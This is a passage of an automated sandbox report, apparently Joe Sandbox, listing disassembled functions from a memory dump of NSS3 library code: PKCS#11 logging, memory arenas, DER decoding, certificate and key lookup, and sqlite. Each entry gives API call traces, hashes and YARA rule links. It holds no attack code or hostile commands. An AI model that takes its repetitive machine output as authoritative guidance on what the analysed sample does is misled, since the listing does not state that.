                                                              • API String ID: 183580322-336475711
                                                              • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                              • Instruction ID: a56310c25bdc2b88e94b6758966ad18778810c5487655e9635b0c949a36ce52f
                                                              • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                              • Instruction Fuzzy Hash: 3831B1B6D082169FFB018AA4EC0576F7FEDAF84798F164425DD14A7200E7B2EA14C7D2
                                                              Function 6D106C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_DigestInit), ref: 6D106C66
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D106C94
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D106CA3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D106CB9
                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6D106CD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                              • API String ID: 1003633598-3690128261
                                                              • Opcode ID: bcdb5f001e20b4ce2806ac9e24311d14d5f77365dac1f73c67d2da69f5e3940d
                                                              • Instruction ID: f9baf7258cdb7b0d4a528d225a28842ef791f6fa11906744e56058d425997437
                                                              • Opcode Fuzzy Hash: bcdb5f001e20b4ce2806ac9e24311d14d5f77365dac1f73c67d2da69f5e3940d
                                                              • Instruction Fuzzy Hash: EC21F5785041089BD720BF65AE8CB6F37B5EF8231CF064024E60997217DFB09985CBE2
                                                              Function 6D109DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_SessionCancel), ref: 6D109DF6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D109E24
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D109E33
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D109E49
                                                              • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6D109E65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                              • API String ID: 1003633598-1678415578
                                                              • Opcode ID: a586153309a37b4ab9fdf489d54709a7be29679021bd4dd8fedae10a4f63b924
                                                              • Instruction ID: 16430d83e77de8bfd25b801b3be535860d3408c81aa2cdb25af32cf5a29e893a
                                                              • Opcode Fuzzy Hash: a586153309a37b4ab9fdf489d54709a7be29679021bd4dd8fedae10a4f63b924
                                                              • Instruction Fuzzy Hash: A02126B45441089FD720AF55DEACB2F33B4EF8270CF0A4024EA09A7216DFB49D45CBA2
                                                              Function 6D0D6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6D0D7D8F,6D0D7D8F,?,?), ref: 6D0D6DC8
                                                                • Part of subcall function 6D12FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D12FE08
                                                                • Part of subcall function 6D12FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D12FE1D
                                                                • Part of subcall function 6D12FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D12FE62
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6D0D7D8F,?,?), ref: 6D0D6DD5
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FA0,00000000,?,?,?,?,6D0D7D8F,?,?), ref: 6D0D6DF7
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D0D6E35
                                                                • Part of subcall function 6D12FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D12FE29
                                                                • Part of subcall function 6D12FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D12FE3D
                                                                • Part of subcall function 6D12FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6D12FE6F
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D0D6E4C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FE0,00000000), ref: 6D0D6E82
                                                                • Part of subcall function 6D0D6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6D0DB21D,00000000,00000000,6D0DB219,?,6D0D6BFB,00000000,?,00000000,00000000,?,?,?,6D0DB21D), ref: 6D0D6B01
                                                                • Part of subcall function 6D0D6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6D0D6B8A
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D0D6F1E
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D0D6F35
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FE0,00000000), ref: 6D0D6F6B
                                                              • PR_SetError.NSS3(FFFFE005,00000000,6D0D7D8F,?,?), ref: 6D0D6FE1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                              • String ID:
                                                              • API String ID: 587344769-0
                                                              • Opcode ID: 62eeb3207c5ff32d77833829839a5f67bc009d8d8e957a5131f144d6e7c021a9
                                                              • Instruction ID: 6a100c6c05b124d167988eec97c9987b772d884a0b4a39384952a75d9ff8557c
                                                              • Opcode Fuzzy Hash: 62eeb3207c5ff32d77833829839a5f67bc009d8d8e957a5131f144d6e7c021a9
                                                              • Instruction Fuzzy Hash: 5B716C71D0474A9FEB40CF55CD40BBABBE4BF94308F56422AE9189B211E771EA94CBD0
                                                              Function 6D11ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE10
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE24
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,6D0FD079,00000000,00000001), ref: 6D11AE5A
                                                              • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE6F
                                                              • free.MOZGLUE(85145F8B,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE7F
                                                              • TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEB1
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEC9
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEF1
                                                              • free.MOZGLUE(6D0FCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?), ref: 6D11AF0B
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AF30
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                              • String ID:
                                                              • API String ID: 161582014-0
                                                              • Opcode ID: 8a32268d7c98aef127fd10cbcc7a04e00c3028600a7588c36fdcb21ac951aa75
                                                              • Instruction ID: 00b46208c11954b33c2cc034eff4f501a06f66725e21750d70a55ce6a8faa593
                                                              • Opcode Fuzzy Hash: 8a32268d7c98aef127fd10cbcc7a04e00c3028600a7588c36fdcb21ac951aa75
                                                              • Instruction Fuzzy Hash: 2651D1B5908602EFDB05CF24DC84B2ABBB4FF04314F014264E91897615E7B1F8A9CBD1
                                                              Function 6D0F4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CB4
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CC8
                                                              • TlsGetValue.KERNEL32(?,6D0FAB7F,?,00000000,?), ref: 6D0F4CE0
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CF4
                                                              • PL_HashTableLookup.NSS3(?,?,?,6D0FAB7F,?,00000000,?), ref: 6D0F4D03
                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6D0F4D10
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • PR_Now.NSS3(?,00000000,?), ref: 6D0F4D26
                                                                • Part of subcall function 6D199DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DC6
                                                                • Part of subcall function 6D199DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DD1
                                                                • Part of subcall function 6D199DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D199DED
                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6D0F4D98
                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6D0F4DDA
                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6D0F4E02
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 4032354334-0
                                                              • Opcode ID: a6c5c46fd66354bf13b1df8caab8566fc1510bfab5a611e12d89c74c62d41d05
                                                              • Instruction ID: bfa34fa0796d55181e4d793b1d95a22085832c374ee54cc7cfb667db2f76999b
                                                              • Opcode Fuzzy Hash: a6c5c46fd66354bf13b1df8caab8566fc1510bfab5a611e12d89c74c62d41d05
                                                              • Instruction Fuzzy Hash: 8541B4B5D04205AFFB119F64ED44B2A77B8BF49258F164170ED0887312EB31D965CBE2
                                                              Function 6D0BFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_initialize.NSS3 ref: 6D0BFD18
                                                              • sqlite3_initialize.NSS3 ref: 6D0BFD5F
                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6D0BFD89
                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6D0BFD99
                                                              • sqlite3_free.NSS3(00000000), ref: 6D0BFE3C
                                                              • sqlite3_free.NSS3(?), ref: 6D0BFEE3
                                                              • sqlite3_free.NSS3(?), ref: 6D0BFEEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                              • String ID: simple
                                                              • API String ID: 1130978851-3246079234
                                                              • Opcode ID: 05c2cf294e538cf5484580b3293261be9b2171119eb57b42c55c06ca22c05436
                                                              • Instruction ID: 61908ee3e4577bfeda203282f1f059c44d2f97699cb5796edb71f3eccbcd237f
                                                              • Opcode Fuzzy Hash: 05c2cf294e538cf5484580b3293261be9b2171119eb57b42c55c06ca22c05436
                                                              • Instruction Fuzzy Hash: 92915DB8A082068FEB04CF55C980B7ABBFAFF84314F15C168D9299B352D732E951CB50
                                                              Function 6D0ADCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D0ADDF9
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D0ADE68
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D0ADE97
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D0ADEB6
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D0ADF78
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 1526119172-598938438
                                                              • Opcode ID: a7601ea0631777dfaf9ca047cde924fb707f5a9b6799512ce5426fe2d6a89d94
                                                              • Instruction ID: 43f292ecb42acc0f74eeae035376d26523db385e4f6b6f97c5d4f9eea448eda8
                                                              • Opcode Fuzzy Hash: a7601ea0631777dfaf9ca047cde924fb707f5a9b6799512ce5426fe2d6a89d94
                                                              • Instruction Fuzzy Hash: 25819F71A083019FE714DFA5C884B2A77E1BF85308F19886DED9A8B252F735E841C762
                                                              Function 6D11CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6D11CD08
                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6D11CE16
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11D079
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                              • String ID:
                                                              • API String ID: 1351604052-0
                                                              • Opcode ID: d682b63feb19ca57142856f2f7d7a732ddba6dc6807d16f5af4a7204aaa01288
                                                              • Instruction ID: 2b9ee9d47d28a1abeb09f45ba0f98807b99e3e6a970b0a8db9a26be1c2d5216a
                                                              • Opcode Fuzzy Hash: d682b63feb19ca57142856f2f7d7a732ddba6dc6807d16f5af4a7204aaa01288
                                                              • Instruction Fuzzy Hash: 07C191B190421A9BDB20CF24CC80BDAB7B5BF58318F0541B8E94CA7245E7B5EE95CF90
                                                              Function 6D10DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6D1197C1,?,00000000,00000000,?,?,?,00000000,?,6D0F7F4A,00000000), ref: 6D10DC68
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DD36
                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE2D
                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE43
                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE76
                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF32
                                                              • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF5F
                                                              • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF78
                                                              • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DFAA
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$memcpy$Valuemalloc
                                                              • String ID:
                                                              • API String ID: 1886645929-0
                                                              • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                              • Instruction ID: 73a9d011c7246688be931c55a3a83d1ce66e26d9f7526d570e4a54fdcf3f2883
                                                              • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                              • Instruction Fuzzy Hash: 6C81C4706846068BFB156A19D89037972D6EBF4340F11C43ADB19CAAEDEFFCC880C642
                                                              Function 6D0E3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6D0E3C76
                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6D0E3C94
                                                                • Part of subcall function 6D0D95B0: TlsGetValue.KERNEL32(00000000,?,6D0F00D2,00000000), ref: 6D0D95D2
                                                                • Part of subcall function 6D0D95B0: EnterCriticalSection.KERNEL32(?,?,?,6D0F00D2,00000000), ref: 6D0D95E7
                                                                • Part of subcall function 6D0D95B0: PR_Unlock.NSS3(?,?,?,?,6D0F00D2,00000000), ref: 6D0D9605
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0E3CB2
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6D0E3CCA
                                                              • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6D0E3CE1
                                                                • Part of subcall function 6D0E3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D0FAE42), ref: 6D0E30AA
                                                                • Part of subcall function 6D0E3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D0E30C7
                                                                • Part of subcall function 6D0E3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6D0E30E5
                                                                • Part of subcall function 6D0E3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D0E3116
                                                                • Part of subcall function 6D0E3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D0E312B
                                                                • Part of subcall function 6D0E3090: PK11_DestroyObject.NSS3(?,?), ref: 6D0E3154
                                                                • Part of subcall function 6D0E3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0E317E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
